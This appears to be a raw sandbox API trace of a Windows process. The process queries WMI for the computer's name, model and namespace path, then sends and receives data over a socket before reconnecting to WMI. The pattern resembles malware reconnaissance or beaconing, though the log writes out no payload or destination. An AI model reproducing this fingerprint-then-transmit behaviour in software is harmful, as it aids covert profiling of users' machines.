	[0262.348] IWbemClassObject:Get (in: This=0x6092150, wszName="__NAMESPACE", lFlags=0, pVal=0x5faea18*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ffbb04*=8, plFlavor=0x2ffbb08*=64 | out: pVal=0x5faea18*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x2ffbb04*=8, plFlavor=0x2ffbb08*=64) returned 0x0
	[0262.348] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0262.348] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608de40, puCount=0x5faea58 | out: puCount=0x5faea58*=0x2) returned 0x0
	[0262.348] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=4, puBuffLength=0x5faea54*=0x0, pszText=0x0 | out: puBuffLength=0x5faea54*=0x17, pszText=0x0) returned 0x0
	[0262.348] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=4, puBuffLength=0x5faea54*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea54*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.348] IWbemClassObject:Get (in: This=0x6092150, wszName="__CLASS", lFlags=0, pVal=0x5faea14*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ffbbbc*=0, plFlavor=0x2ffbbc0*=0 | out: pVal=0x5faea14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x2ffbbbc*=8, plFlavor=0x2ffbbc0*=64) returned 0x0
	[0262.348] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0262.349] IWbemClassObject:Get (in: This=0x6092150, wszName="__CLASS", lFlags=0, pVal=0x5faea18*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ffbbbc*=8, plFlavor=0x2ffbbc0*=64 | out: pVal=0x5faea18*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x2ffbbbc*=8, plFlavor=0x2ffbbc0*=64) returned 0x0
	[0262.349] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0262.349] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608de40, puCount=0x5faea48 | out: puCount=0x5faea48*=0x2) returned 0x0
	[0262.349] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=4, puBuffLength=0x5faea44*=0x0, pszText=0x0 | out: puBuffLength=0x5faea44*=0x17, pszText=0x0) returned 0x0
	[0262.349] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=4, puBuffLength=0x5faea44*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea44*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.349] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608de40, puCount=0x5faea48 | out: puCount=0x5faea48*=0x2) returned 0x0
	[0262.349] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=4, puBuffLength=0x5faea44*=0x0, pszText=0x0 | out: puBuffLength=0x5faea44*=0x17, pszText=0x0) returned 0x0
	[0262.349] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=4, puBuffLength=0x5faea44*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea44*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.349] IWbemClassObject:GetNames (in: This=0x6092150, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x5faea0c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x5fae9d8 | out: pNames=0x5fae9d8*="\x01ƀ\x04") returned 0x0
	[0262.349] SafeArrayGetDim (psa=0x586398) returned 0x1
	[0262.349] SafeArrayGetDim (psa=0x586398) returned 0x1
	[0262.349] SafeArrayGetLBound (in: psa=0x586398, nDim=0x1, plLbound=0x5fae5d4 | out: plLbound=0x5fae5d4) returned 0x0
	[0262.350] IWbemClassObject:Get (in: This=0x6092150, wszName="__GENUS", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ffc714*=0, plFlavor=0x2ffc718*=0 | out: pVal=0x5faea04*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x2ffc714*=3, plFlavor=0x2ffc718*=64) returned 0x0
	[0262.350] IWbemClassObject:Get (in: This=0x6092150, wszName="__CLASS", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ffc748*=0, plFlavor=0x2ffc74c*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x2ffc748*=8, plFlavor=0x2ffc74c*=64) returned 0x0
	[0262.350] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0262.350] IWbemClassObject:Get (in: This=0x6092150, wszName="__SUPERCLASS", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ffc7ac*=0, plFlavor=0x2ffc7b0*=0 | out: pVal=0x5faea04*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ffc7ac*=8, plFlavor=0x2ffc7b0*=64) returned 0x0
	[0262.351] IWbemClassObject:Get (in: This=0x6092150, wszName="__DYNASTY", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ffc7d4*=0, plFlavor=0x2ffc7d8*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x2ffc7d4*=8, plFlavor=0x2ffc7d8*=64) returned 0x0
	[0262.351] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0262.351] IWbemClassObject:Get (in: This=0x6092150, wszName="__RELPATH", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ffc838*=0, plFlavor=0x2ffc83c*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x2ffc838*=8, plFlavor=0x2ffc83c*=64) returned 0x0
	[0262.351] SysStringLen (param_1="Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x25
	[0262.351] IWbemClassObject:Get (in: This=0x6092150, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ffc8bc*=0, plFlavor=0x2ffc8c0*=0 | out: pVal=0x5faea04*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), pType=0x2ffc8bc*=3, plFlavor=0x2ffc8c0*=64) returned 0x0
	[0262.351] IWbemClassObject:Get (in: This=0x6092150, wszName="__DERIVATION", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ffc8f0*=0, plFlavor=0x2ffc8f4*=0 | out: pVal=0x5faea04*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x586398*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x61c7b60, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x2ffc8f0*=8200, plFlavor=0x2ffc8f4*=64) returned 0x0
	[0262.352] IWbemClassObject:Get (in: This=0x6092150, wszName="__SERVER", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ffc928*=0, plFlavor=0x2ffc92c*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x2ffc928*=8, plFlavor=0x2ffc92c*=64) returned 0x0
	[0262.352] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0262.352] IWbemClassObject:Get (in: This=0x6092150, wszName="__NAMESPACE", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ffc974*=0, plFlavor=0x2ffc978*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x2ffc974*=8, plFlavor=0x2ffc978*=64) returned 0x0
	[0262.352] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0262.352] IWbemClassObject:Get (in: This=0x6092150, wszName="__PATH", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ffc9c4*=0, plFlavor=0x2ffc9c8*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x2ffc9c4*=8, plFlavor=0x2ffc9c8*=64) returned 0x0
	[0262.352] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0262.352] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608de40, puCount=0x5faea84 | out: puCount=0x5faea84*=0x2) returned 0x0
	[0262.352] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=4, puBuffLength=0x5faea80*=0x0, pszText=0x0 | out: puBuffLength=0x5faea80*=0x17, pszText=0x0) returned 0x0
	[0262.352] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=4, puBuffLength=0x5faea80*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea80*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.353] IWbemClassObject:Get (in: This=0x6092150, wszName="Model", lFlags=0, pVal=0x5faea40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ffcac8*=0, plFlavor=0x2ffcacc*=0 | out: pVal=0x5faea40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="M5X0JE", varVal2=0x0), pType=0x2ffcac8*=8, plFlavor=0x2ffcacc*=32) returned 0x0
	[0262.353] SysStringLen (param_1="M5X0JE") returned 0x6
	[0262.353] IWbemClassObject:Get (in: This=0x6092150, wszName="Model", lFlags=0, pVal=0x5faeaf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ffcac8*=8, plFlavor=0x2ffcacc*=32 | out: pVal=0x5faeaf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="M5X0JE", varVal2=0x0), pType=0x2ffcac8*=8, plFlavor=0x2ffcacc*=32) returned 0x0
	[0262.353] SysStringLen (param_1="M5X0JE") returned 0x6
	[0262.353] send (s=0x424, buf=0x2ffd9bc*, len=26, flags=0) returned 26
	[0262.365] GetLastError () returned 0x0
	[0262.365] recv (in: s=0x424, buf=0x2fac898, len=502, flags=0 | out: buf=0x2fac898*) returned 136
	[0263.190] GetLastError () returned 0x0
	[0263.192] VirtualQuery (in: lpAddress=0x5fade58, lpBuffer=0x5faee58, dwLength=0x1c | out: lpBuffer=0x5faee58*(BaseAddress=0x5fad000, AllocationBase=0x5620000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0263.193] CoGetObjectContext (in: riid=0x2b5ad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae9cc | out: ppv=0x5fae9cc*=0x4a8dec) returned 0x0
	[0263.194] IComThreadingInfo:GetCurrentApartmentType (in: This=0x4a8dec, pAptType=0x5fae9c4 | out: pAptType=0x5fae9c4*=1) returned 0x0
	[0263.194] IUnknown:QueryInterface (in: This=0x4a8dec, riid=0x2b5ace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5fae9c8 | out: ppvObject=0x5fae9c8*=0x0) returned 0x80004002
	[0263.194] IUnknown:Release (This=0x4a8dec) returned 0x1
	[0263.194] CoGetClassObject (in: rclsid=0x563d04*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae4e4 | out: ppv=0x5fae4e4*=0x6091f58) returned 0x0
	[0263.195] WbemDefPath:IUnknown:QueryInterface (in: This=0x6091f58, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fae314 | out: ppvObject=0x5fae314*=0x0) returned 0x80004002
	[0263.195] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6091f58, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae34c | out: ppvObject=0x5fae34c*=0x6092088) returned 0x0
	[0263.195] WbemDefPath:IUnknown:QueryInterface (in: This=0x6092088, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae0f0 | out: ppvObject=0x5fae0f0*=0x6092088) returned 0x0
	[0263.195] WbemDefPath:IUnknown:QueryInterface (in: This=0x6092088, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fae0ac | out: ppvObject=0x5fae0ac*=0x0) returned 0x80004002
	[0263.195] WbemDefPath:IUnknown:AddRef (This=0x6092088) returned 0x3
	[0263.196] CoGetContextToken (in: pToken=0x5fadf38 | out: pToken=0x5fadf38) returned 0x0
	[0263.196] WbemDefPath:IUnknown:QueryInterface (in: This=0x6092088, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadf20 | out: ppvObject=0x5fadf20*=0x61c7b60) returned 0x0
	[0263.196] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x61c7b60, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadf28 | out: pCid=0x5fadf28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0263.196] WbemDefPath:IUnknown:Release (This=0x61c7b60) returned 0x3
	[0263.196] CoGetContextToken (in: pToken=0x5fadf30 | out: pToken=0x5fadf30) returned 0x0
	[0263.196] WbemDefPath:IUnknown:AddRef (This=0x6092088) returned 0x4
	[0263.196] WbemDefPath:IUnknown:QueryInterface (in: This=0x6092088, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadfa4 | out: ppvObject=0x5fadfa4*=0x0) returned 0x80004002
	[0263.196] WbemDefPath:IUnknown:Release (This=0x6092088) returned 0x3
	[0263.197] WbemDefPath:IUnknown:Release (This=0x6092088) returned 0x2
	[0263.197] WbemDefPath:IUnknown:Release (This=0x6091f58) returned 0x0
	[0263.197] WbemDefPath:IUnknown:Release (This=0x6092088) returned 0x1
	[0263.197] CoGetContextToken (in: pToken=0x5fae7e0 | out: pToken=0x5fae7e0) returned 0x0
	[0263.197] CoGetContextToken (in: pToken=0x5fae7a0 | out: pToken=0x5fae7a0) returned 0x0
	[0263.197] WbemDefPath:IUnknown:AddRef (This=0x6092088) returned 0x2
	[0263.197] WbemDefPath:IUnknown:QueryInterface (in: This=0x6092088, riid=0x5fae81c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae818 | out: ppvObject=0x5fae818*=0x6092088) returned 0x0
	[0263.197] WbemDefPath:IUnknown:Release (This=0x6092088) returned 0x2
	[0263.197] WbemDefPath:IUnknown:Release (This=0x6092088) returned 0x1
	[0263.197] CoGetContextToken (in: pToken=0x5fae860 | out: pToken=0x5fae860) returned 0x0
	[0263.198] CoGetContextToken (in: pToken=0x5fae820 | out: pToken=0x5fae820) returned 0x0
	[0263.198] WbemDefPath:IUnknown:AddRef (This=0x6092088) returned 0x2
	[0263.198] WbemDefPath:IUnknown:QueryInterface (in: This=0x6092088, riid=0x5fae89c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae898 | out: ppvObject=0x5fae898*=0x6092088) returned 0x0
	[0263.198] WbemDefPath:IUnknown:Release (This=0x6092088) returned 0x2
	[0263.198] WbemDefPath:IUnknown:AddRef (This=0x6092088) returned 0x3
	[0263.198] WbemDefPath:IWbemPath:SetText (This=0x6092088, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.198] WbemDefPath:IUnknown:Release (This=0x6092088) returned 0x2
	[0263.198] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6092088, puCount=0x5faea04 | out: puCount=0x5faea04*=0x2) returned 0x0
	[0263.198] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=4, puBuffLength=0x5faea00*=0x0, pszText=0x0 | out: puBuffLength=0x5faea00*=0x17, pszText=0x0) returned 0x0
	[0263.198] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=4, puBuffLength=0x5faea00*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea00*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.198] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6092088, puCount=0x5faea00 | out: puCount=0x5faea00*=0x2) returned 0x0
	[0263.198] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=4, puBuffLength=0x5fae9fc*=0x0, pszText=0x0 | out: puBuffLength=0x5fae9fc*=0x17, pszText=0x0) returned 0x0
	[0263.198] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=4, puBuffLength=0x5fae9fc*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae9fc*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.198] CoGetObjectContext (in: riid=0x2b5ad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae97c | out: ppv=0x5fae97c*=0x4a8dec) returned 0x0
	[0263.199] IComThreadingInfo:GetCurrentApartmentType (in: This=0x4a8dec, pAptType=0x5fae974 | out: pAptType=0x5fae974*=1) returned 0x0
	[0263.199] IUnknown:QueryInterface (in: This=0x4a8dec, riid=0x2b5ace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5fae978 | out: ppvObject=0x5fae978*=0x0) returned 0x80004002
	[0263.199] IUnknown:Release (This=0x4a8dec) returned 0x1
	[0263.199] CoGetClassObject (in: rclsid=0x556acc*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae7cc | out: ppv=0x5fae7cc*=0x608dbd8) returned 0x0
	[0263.199] WbemLocator:IUnknown:QueryInterface (in: This=0x608dbd8, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fae5fc | out: ppvObject=0x5fae5fc*=0x0) returned 0x80004002
	[0263.199] WbemLocator:IClassFactory:CreateInstance (in: This=0x608dbd8, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae634 | out: ppvObject=0x5fae634*=0x6091f58) returned 0x0
	[0263.200] WbemLocator:IUnknown:QueryInterface (in: This=0x6091f58, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae3d8 | out: ppvObject=0x5fae3d8*=0x6091f58) returned 0x0
	[0263.200] WbemLocator:IUnknown:QueryInterface (in: This=0x6091f58, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fae394 | out: ppvObject=0x5fae394*=0x0) returned 0x80004002
	[0263.200] WbemLocator:IUnknown:AddRef (This=0x6091f58) returned 0x3
	[0263.200] CoGetContextToken (in: pToken=0x5fae220 | out: pToken=0x5fae220) returned 0x0
	[0263.200] WbemLocator:IUnknown:QueryInterface (in: This=0x6091f58, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae208 | out: ppvObject=0x5fae208*=0x0) returned 0x80004002
	[0263.200] CoGetContextToken (in: pToken=0x5fae218 | out: pToken=0x5fae218) returned 0x0
	[0263.200] WbemLocator:IUnknown:AddRef (This=0x6091f58) returned 0x4
	[0263.201] WbemLocator:IUnknown:QueryInterface (in: This=0x6091f58, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae28c | out: ppvObject=0x5fae28c*=0x0) returned 0x80004002
	[0263.201] WbemLocator:IUnknown:Release (This=0x6091f58) returned 0x3
	[0263.201] WbemLocator:IUnknown:Release (This=0x6091f58) returned 0x2
	[0263.201] WbemLocator:IUnknown:Release (This=0x608dbd8) returned 0x0
	[0263.201] WbemLocator:IUnknown:Release (This=0x6091f58) returned 0x1
	[0263.201] CoGetContextToken (in: pToken=0x5fae724 | out: pToken=0x5fae724) returned 0x0
	[0263.201] CoGetContextToken (in: pToken=0x5fae6e4 | out: pToken=0x5fae6e4) returned 0x0
	[0263.201] WbemLocator:IUnknown:AddRef (This=0x6091f58) returned 0x2
	[0263.201] WbemLocator:IUnknown:QueryInterface (in: This=0x6091f58, riid=0x5fae760*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5fae75c | out: ppvObject=0x5fae75c*=0x6091f58) returned 0x0
	[0263.201] WbemLocator:IUnknown:Release (This=0x6091f58) returned 0x2
	[0263.202] WbemLocator:IUnknown:Release (This=0x6091f58) returned 0x1
	[0263.202] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6092088, puCount=0x5fae954 | out: puCount=0x5fae954*=0x2) returned 0x0
	[0263.202] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=8, puBuffLength=0x5fae950*=0x0, pszText=0x0 | out: puBuffLength=0x5fae950*=0x17, pszText=0x0) returned 0x0
	[0263.202] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=8, puBuffLength=0x5fae950*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae950*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.202] CoCreateInstance (in: rclsid=0x6a3113a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6a3112d0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x5fae42c | out: ppv=0x5fae42c*=0x608dee8) returned 0x0
	[0263.202] WbemLocator:IWbemLocator:ConnectServer (in: This=0x608dee8, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x5fae478 | out: ppNamespace=0x5fae478*=0x609213c) returned 0x0
	[0263.267] WbemLocator:IUnknown:QueryInterface (in: This=0x609213c, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae348 | out: ppvObject=0x5fae348*=0x5872bc) returned 0x0
	[0263.267] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x5872bc, pProxy=0x609213c, pAuthnSvc=0x5fae390, pAuthzSvc=0x5fae38c, pServerPrincName=0x5fae39c, pAuthnLevel=0x5fae394, pImpLevel=0x5fae380, pAuthInfo=0x5fae384, pCapabilites=0x5fae388 | out: pAuthnSvc=0x5fae390*=0xa, pAuthzSvc=0x5fae38c*=0x0, pServerPrincName=0x5fae39c, pAuthnLevel=0x5fae394*=0x6, pImpLevel=0x5fae380*=0x2, pAuthInfo=0x5fae384, pCapabilites=0x5fae388*=0x1) returned 0x0
	[0263.267] WbemLocator:IUnknown:Release (This=0x5872bc) returned 0x1
	[0263.267] WbemLocator:IUnknown:QueryInterface (in: This=0x609213c, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae33c | out: ppvObject=0x5fae33c*=0x5872dc) returned 0x0
